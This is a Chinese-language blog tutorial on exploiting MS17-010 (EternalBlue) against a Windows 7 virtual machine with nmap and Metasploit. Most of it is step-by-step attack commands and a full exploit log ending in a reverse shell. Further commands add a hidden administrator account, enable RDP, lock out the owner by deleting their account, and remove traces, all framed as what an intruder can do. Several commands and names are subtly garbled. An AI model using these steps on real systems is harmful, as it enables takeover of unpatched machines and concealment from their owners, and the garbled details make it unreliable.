网络安全-MS17-010漏洞-永恒之蓝
这个东西怎么说呢,无论是干网络的没干网络的,估计每个人都听说过这个叫做永恒之蓝的东西 这个东东当时可谓是红极一时,现在也有点热度 这个漏洞呢,在win10是不可以的,win8也是不行滴,只有win7以及以下的电脑,才有这个漏洞,因为win7之后微软把他给修复了 win7靶机安装中(VM虚拟机)
永恒之蓝漏洞原理
通过TCP445端口,445端口(文件共享SMB协议专用) 在那个年代,特别是中国的高校,默认情况下都是开启的,因为内网。去植入病毒。植入病毒後,就可以远程提权,有权限, 就可以干很多事情,可以执行任意代码(包括恶意代码)
WIN7需要的操作
因为现在的win7你拿到的版本都是默认打开的,默认打开则会阻断445端口,无法攻击,所以要手动关,实际上也是很多设备关闭防火墙的。 关闭防火墙 cmd下输入firewall.cpl,两个全部关掉即可 然后把这个远程RDP开起来 在控制面板的系统与安全里面 开启445SMB端口. 找到以下路径 ![在这里插入图片描述](https://img-blog.csdnimg.cn/7ac384e58a7d4b28bd09867c5819af93.png)
![在这里插入图片描述](https://img-blog.csdnimg.cn/bef21d041ce449c586120299846ab42c.png)
一路找到这个路径
然后点击parameters
然后右键新建一个项,选32位的
命名为SMBDerviceEnabled
然后把他的数值数据改成1
完了一定要点确认
![在这里插入图片描述](https://img-blog.csdnimg.cn/3675b940fa144299a851c7a49d8de14a.png)
然后就到kali了
![在这里插入图片描述](https://img-blog.csdnimg.cn/f4e48a5352604ef89f57b562d6b1fd80.png)
先用nmap扫描一波(nmap是端口扫描工具) 发现了445端口是开启的,其他的暂时不用管
nmap --script smb-vuln-msc17-010.nse x.x.x.x(x为真实ip)
防止你们看不懂,给你们翻译一波
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
Nmap done: 1 IP address (1 host up) scanned in 2.21 seconds
主机脚本结果:
|smb-vuln-ms17-010:
|易受攻击:
|Microsoft SMBv1服务器中的远程代码执行漏洞(ms17-010)
|状态:VULNERABLE
|ID:CVE:CVE-2017-0143
|风险因素:高
|Microsoft SMBv1中存在严重的远程代码执行漏洞
|服务器(ms17-010)。
|
|披露日期:2017-03-14
|参考文献:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
Nmap完成:2.21秒内扫描1个IP地址(1个主机启动)
这已经证明可以攻击了,我们平时也不用刻意去翻译,因为做多了你就能看懂了 重点是这个 VULNERABLE:,就证明他是漏洞,脆弱的漏洞
然后输入这个msfconsole,进入msf这个攻击的工具
MSF是啥
![在这里插入图片描述](https://img-blog.csdnimg.cn/5a60f9d58aaf4af590bef343b05212f8.png)
简单的说,他就是一个攻击的集成工具包 前面这里会变成msf6 查找漏洞的利用模块 ![在这里插入图片描述](https://img-blog.csdnimg.cn/26d35a9e43194de19c5a0c7bccba4ff1.png)
search ms17-010,其中,找出来最上面的那个成功率是最大的
绑定攻击模块相当于武器库里面找到了什么武器 ![在这里插入图片描述](https://img-blog.csdnimg.cn/91906ea10c14489385c608a8f3885862.png)
use 0(要用那个模块就选择什么数字)
输入:options
凡是出现yes的,都是需要我们去设置的 这个地方表示的是IP地址 ![在这里插入图片描述](https://img-blog.csdnimg.cn/486ca2a22a1c4a758ad98ba2e5b5db37.png)
比如啥呢,武器买了回来得会咋用吧,咋开火,打谁你得知道吧,怎么瞄准得会吧
设置攻击目标的IP ![在这里插入图片描述](https://img-blog.csdnimg.cn/188d1eb2d10d4e2b8c342545588465d2.png)
set rhosts x.x.x.x x为IP地址
一切就绪,就差执行 run,执行程序 ![在这里插入图片描述](https://img-blog.csdnimg.cn/057d4d1dcff344a39d26aa618feb3101.png)
翻译
[*]已在192.168.248.136:4444上启动反向TCP处理程序
[*]192.168.248.222:445-使用辅助/scanner/smb/smb_ms17_010作为检查
[+]192.168.248.222:445-主机可能对MS17-010不可用!-Windows 7 Professional 7601 Service Pack 1 x64(64位)
[*]192.168.248.222:445-已扫描1台主机(共1台)(100%完成)
[+]192.168.248.222:445-目标易受攻击。
[*]192.168.248.222:445-正在连接到目标进行利用。
[+]192.168.248.222:445-已建立用于利用的连接。
[+]192.168.248.222:445-选择的目标操作系统对SMB回复指示的操作系统有效
[*]192.168.248.222:445-CORE原始缓冲区转储(42字节)
[*]192.168.248.222:445-0x0000000057 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7专业版
[*]192.168.248.222:445-0x00000010 73 69 f 6e 61 6c 20 37 36 30 20 53 65 72 76项7601服务
[*]192.168.248.222:445-0x00000020 69 63 65 20 50 61 63 6b 20 31冰块1
[+]192.168.248.222:445-为DCE/RPC回复指示的拱门选择的目标拱门有效
[*]192.168.248.222:445-尝试利用12个Groom分配进行攻击。
[*]192.168.248.222:445-发送攻击数据包的除最后一个片段之外的所有片段
[*]192.168.248.222:445-开始非分页池整理
[+]192.168.248.222:445-发送SMBv2缓冲区
[+]192.168.248.222:445-关闭SMBv1连接,在SMBv2缓冲区附近创建空闲孔。
[*]192.168.248.222:445-正在发送最终SMBv2缓冲区。
[*]192.168.248.222:445-正在发送攻击数据包的最后一个片段!
[*]192.168.248.222:445-从漏洞数据包接收响应
[+]192.168.248.222:445-ETERNALBLUE覆盖成功完成(0xC000000D)!
[*]192.168.248.222:445-将彩蛋发送到损坏的连接。
[*]192.168.248.222:445-触发释放损坏的缓冲区。
[*]发送阶段(200774字节)到192.168.248.222
[*]流量计会话1于2023-02-14 01:49:09+0800打开(192.168.248.136:4444->192.168.248.222:49166)
[+] 192.168.248.222:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+]192.168.248.222:445-=-=-=-=--=-==-=-===-=-[-=-==-=-获胜-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.248.222:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
但凡学过英语或者打过游戏都知道WIN=获胜的意思。意思就是证明漏洞已经利用成功了
监听目标主机 ![在这里插入图片描述](https://img-blog.csdnimg.cn/434e6030ee8947fdb8bc3a185771f3d2.png)
Shell(获取对方权限)
shell是最爽的,只要你拿到了shell,跟你直接使用别人电脑没啥区别。但是可以看到乱码了这个没关系 chcp 65001 改一下就好了
可以看到,在kali攻击机上看到的已经是windows 的cmd的命令行了 ipconfig,查看ip地址,本机ip(被攻击ip) 既然都拿到cmd了,那肯定是想干啥就干啥了。 基本上到这里就已经可以宣告对面已经被攻陷了
开始搞事情
既然拿到权限了,那我得远程进去呀,有些事情还是得进去才好呢,虽然也可以不进直接复制他资料搞他什么的 我们可以远程创建一个账户,完了之后搞完事情删除痕迹,那也没人知道呀~ 创建用户
因为我们并不知道他原本的账号密码,知道的话还费啥劲渗透,直接登录就完事了 现在还是正常的账户
net user 账户名 密码 /add
net user ccie ccie /add
账户已经建立了,试想一波,如果我是真正的入侵者,我都有你账户了,我进你系统不是轻轻松松,账户密码都是我自己设置的
但是详细看,我只是标准用户,我要干啥呢?把他变成管理员账户,才能拿到全部权限,然后再把它原本的账户给她干了,他就再也进不来了,咋操作呢?
提权命令
net localgroup administrator 账户名 /add
net localgroup administrator ccie /add
命令行提示已经成功,我们再去看看win7 再来看,我创建的ccie已经是管理员了,在电脑的世界里面管理员没什么是不能做的 那么账户都建立好了 有些电脑他不一定开了远程,那我们就通过命令给他开 ![在这里插入图片描述](https://img-blog.csdnimg.cn/182b175c6cff4b7396a0b7d08ec373a9.png)
run getgui -e
在windows我们可以通过cmd打开mstsc或者手动打开,在kali里面则是用命令
rdesktop 目标IP
desktop就是桌面的意思
那么他这个远程端口就出来了 然后选择其他用户,使用我们刚刚建立的用户 如果无人值守,那也就是30秒的事情 攻击主机上打开了目标机器的桌面,攻击成功,这个时候只要我把它原本的账户删了,不断电的情况下,我想干嘛干嘛,他就再也进不来了,除非断电,重装 然后我现在干掉原有的账户 在原有的机器上登陆就再也进不来了 .无论怎么输入都没用,因为这个账号已经被我删掉了,或者我想放什么恶意程序木马在里面,隐藏起来,他也不知道的呀~ 如果想不留痕迹,那么干完想干的事情之后,删掉自己的用户,对方也会毫无察觉
|